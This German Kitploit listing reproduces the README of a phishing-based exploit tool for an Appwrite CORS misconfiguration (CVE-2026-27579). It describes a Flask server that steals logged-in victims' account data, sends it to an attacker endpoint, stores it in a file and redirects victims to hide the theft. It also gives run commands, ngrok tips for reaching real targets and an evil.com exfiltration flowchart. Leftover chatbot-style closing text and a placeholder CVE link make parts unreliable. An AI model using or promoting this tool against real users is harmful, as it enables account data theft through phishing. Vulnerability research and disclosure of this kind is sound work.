Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-27579-CollabPlatform-Appwrite-CORS-Misconfiguration — Exploit-PoC für CVE-2026-27579, eine CORS-Fehlkonfiguration im Appwrite-Backend, die den Diebstahl authentifizierter Kontodaten über eine bösartige Phishing-Seite demonstriert. | Kitploit
Tools/GitHubGitHub/mbanyamer/cve-2026-27579-collabplatform-appwrite-cors-misconfiguration
Phishing-ToolsSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitRed Teaming
GitHubmbanyamer/cve-2026-27579-collabplatform-appwrite-cors-misconfiguration

CVE-2026-27579-CollabPlatform-Appwrite-CORS-Misconfiguration

Exploit-PoC für CVE-2026-27579, eine CORS-Fehlkonfiguration im Appwrite-Backend, die den Diebstahl authentifizierter Kontodaten über eine bösartige Phishing-Seite demonstriert.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
12vor 6 MonatenNoch nicht geprüft

Appwrite CORS-Fehlkonfiguration Exploit PoC

CVE-2026-27579 – Datenleck authentifizierter Konten durch permissive CORS

Author Role Country Platform Vulnerability CVE Status License

CVE-2026-27579 (GHSA-qh5m-p8jh-hx88)
Eine schwerwiegende CORS-Fehlkonfiguration im Appwrite-Backend, das von der realtime-collaboration-platform verwendet wird, ermöglicht es einem Angreifer-kontrollierten Ursprung, sensible authentifizierte Benutzerdaten (E-Mail, Benutzer-ID, MFA-Status usw.) von eingeloggten Opfern über berechtigte Cross-Origin-Anfragen auszulesen.

Betroffene Software

  • Projekt: realtime-collaboration-platform (CollabPlatform)
  • Backend: Appwrite Cloud mit permissiver CORS-Konfiguration
  • Verwundbare Komponente: /v1/account-Endpunkt mit Access-Control-Allow-Origin-Reflexion + Access-Control-Allow-Credentials: true
  • Auswirkung: Account-Übernahme / Leck sensibler personenbezogener Daten durch Phishing / Besuch bösartiger Seiten

Angriffsablauf-Diagramm

root@kitploit:~
flowchart TD
    A[Victim is logged in\nCollabPlatform / Appwrite] --> B[Victim visits attacker-controlled page\nphishing link / malvertising]
    B --> C[Browser sends GET /v1/account\nwith session cookies credentials: 'include']
    C --> D[Appwrite reflects arbitrary Origin\nAccess-Control-Allow-Origin: evil.com]
    D --> E[Access-Control-Allow-Credentials: true]
    E --> F[Browser allows JavaScript to read response\nemail, $id, mfa, name, ...]
    F --> G[Data exfiltrated to attacker server\nPOST /collect]
    G --> H[Attacker receives full account details]

Funktionen

  • Einfacher Flask-basierter bösartiger Server
  • Erzeugt eine Phishing-Seite, die authentifizierte Appwrite-Kontodaten stiehlt
  • Exfiltriert Daten an den Endpunkt des Angreifers (Ausgabe + Speicherung in Datei)
  • Unterstützt benutzerdefinierte --lhost- und --lport-Parameter
  • Leitet das Opfer nach dem Diebstahl zu Google weiter (verbirgt die Absicht)

Anforderungen

root@kitploit:~
pip install flask

Verwendung

root@kitploit:~
# Grundlegende Verwendung
python3 exploit.py --lhost 192.168.1.100 --lport 8000

# Mit Domain / öffentlicher IP
python3 exploit.py --lhost attacker.yourdomain.com --lport 8080

# Für öffentliche Erreichbarkeit (empfohlen)
# 1. Skript ausführen
# 2. ngrok verwenden: ngrok http 8000
# 3. http://<lhost>:<lport> im Code durch deine ngrok-URL ersetzen
#    (oder erneut mit --lhost = deine-ngrok-url.ngrok-free.app ausführen)

Beispielausgabe beim Ausführen:

root@kitploit:~
[*] Starting malicious server → http://192.168.1.100:8000
[*] Send this link to the target:
    http://192.168.1.100:8000/

Opfer besucht den Link während es eingeloggt ist → Daten erscheinen im Terminal + werden in stolen_accounts.txt gespeichert

Rechtlicher & ethischer Hinweis

Dieser Code dient ausschließlich Bildungszwecken, autorisierten Sicherheitstests, Red-Team-Übungen und Schwachstellenforschung.

Die unbefugte Verwendung gegen ein System oder eine Person ohne ausdrückliche schriftliche Genehmigung ist in den meisten Rechtsordnungen illegal (Computerkriminalität, unbefugter Zugriff, Datendiebstahl, Phishing-Gesetze usw.).

Verwende dies nur in Umgebungen, die dir gehören oder für die du eine formelle Testgenehmigung hast.

Referenzen

  • CVE: https://nvd.nist.gov/vuln/detail/CVE-2026-27579 (Platzhalter – tatsächliche CVE kann abweichen)
  • GitHub Advisory: https://github.com/karnop/realtime-collaboration-platform/security/advisories/GHSA-qh5m-p8jh-hx88
  • CWE-346: Origin Validation Error
  • CWE-942: Permissive Cross-domain Policy with Untrusted Domains

Autor

Mohammed Idrees Banyamer
Security Researcher
Jordanien
Instagram: @banyamer_security

Du kannst dies direkt in deine README.md-Datei kopieren.

Wenn du Screenshots hinzufügen, die Badge-Farben ändern, weitere Abschnitte (Demo, Mitigation usw.) ergänzen oder Lizenz-Badges / Sterne / Fork-Zähler einfügen möchtest – lass es mich wissen und ich kann es erweitern.

Tool herunterladen